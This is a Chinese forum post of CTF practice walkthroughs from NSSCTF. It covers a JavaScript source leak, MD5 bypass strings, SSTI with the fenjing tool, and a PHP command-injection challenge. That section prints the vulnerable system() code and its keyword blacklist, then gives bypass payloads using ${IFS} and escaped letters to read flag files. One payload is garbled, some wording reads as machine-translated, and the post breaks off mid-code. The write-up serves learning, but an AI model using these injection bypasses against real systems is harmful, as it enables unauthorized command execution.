络腮胡菲菲 发表于 2024-9-26 18:14:59

NSSCTF刷题篇1

js范例

js_sign

这是一道js信息泄漏的题目直接检察源码,有一个main.js文件点击之后,有一串数字和一段base64编码,解开base64编码得到这个编码为敲击码
解码在线网站:Tap Code - 许愿星 (wishingstarmoye.com)
注意要将数字之间的空格去掉
2048

检察源代码
https://i-blog.csdnimg.cn/direct/b0fa63b21da345eebb448686fbd57a68.png
找到
    req.open("GET","flag.php?score="+obj.score,true); 这行代码然后直接
https://i-blog.csdnimg.cn/direct/fc21d47a0f184c2491cca6a99b2f4a77.png
得到flag
md5范例

奇妙的MD5

第一关特殊的字符串ffifdyop
第二第三关数组绕过
ssti模板注入

[安洵杯 2020]Normal SSTI

第一种方法
fenjing一把嗦
执行fenjing下令
python -m fenjing webui https://i-blog.csdnimg.cn/direct/a1d99f1f82184522b184fb15db9b7f46.png
然后填写网址一把嗦
下令执行

babyRCE

检察源代码
<?php

$rce = $_GET['rce'];
if (isset($rce)) {
    if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;||\*|\`|\%|\>|\<|\'|\"/i", $rce)) {
      system($rce);
    }else {
      echo "hhhhhhacker!!!"."\n";
    }
} else {
    highlight_file(__FILE__);
} 一个下令执行主要排除了一些打开文件的下令另有空格,这里使用下面的下令进行绕过
?rce=uniq${IFS}fla?.php
?rce=c\at${IFS}fl\ag.php
?rce=ls|grepIFSf∣xargsIFSf∣xargs{IFS}-iIFScpIFScp{IFS}{}${IFS}t.txt 应该另有很多下令就不在列举,至于flag的名字可以直接ls进行检察,并没有克制ls
webshell是啥捏 

源码
<?php
highlight_file(__FILE__);
$
页: [1]
查看完整版本: NSSCTF刷题篇1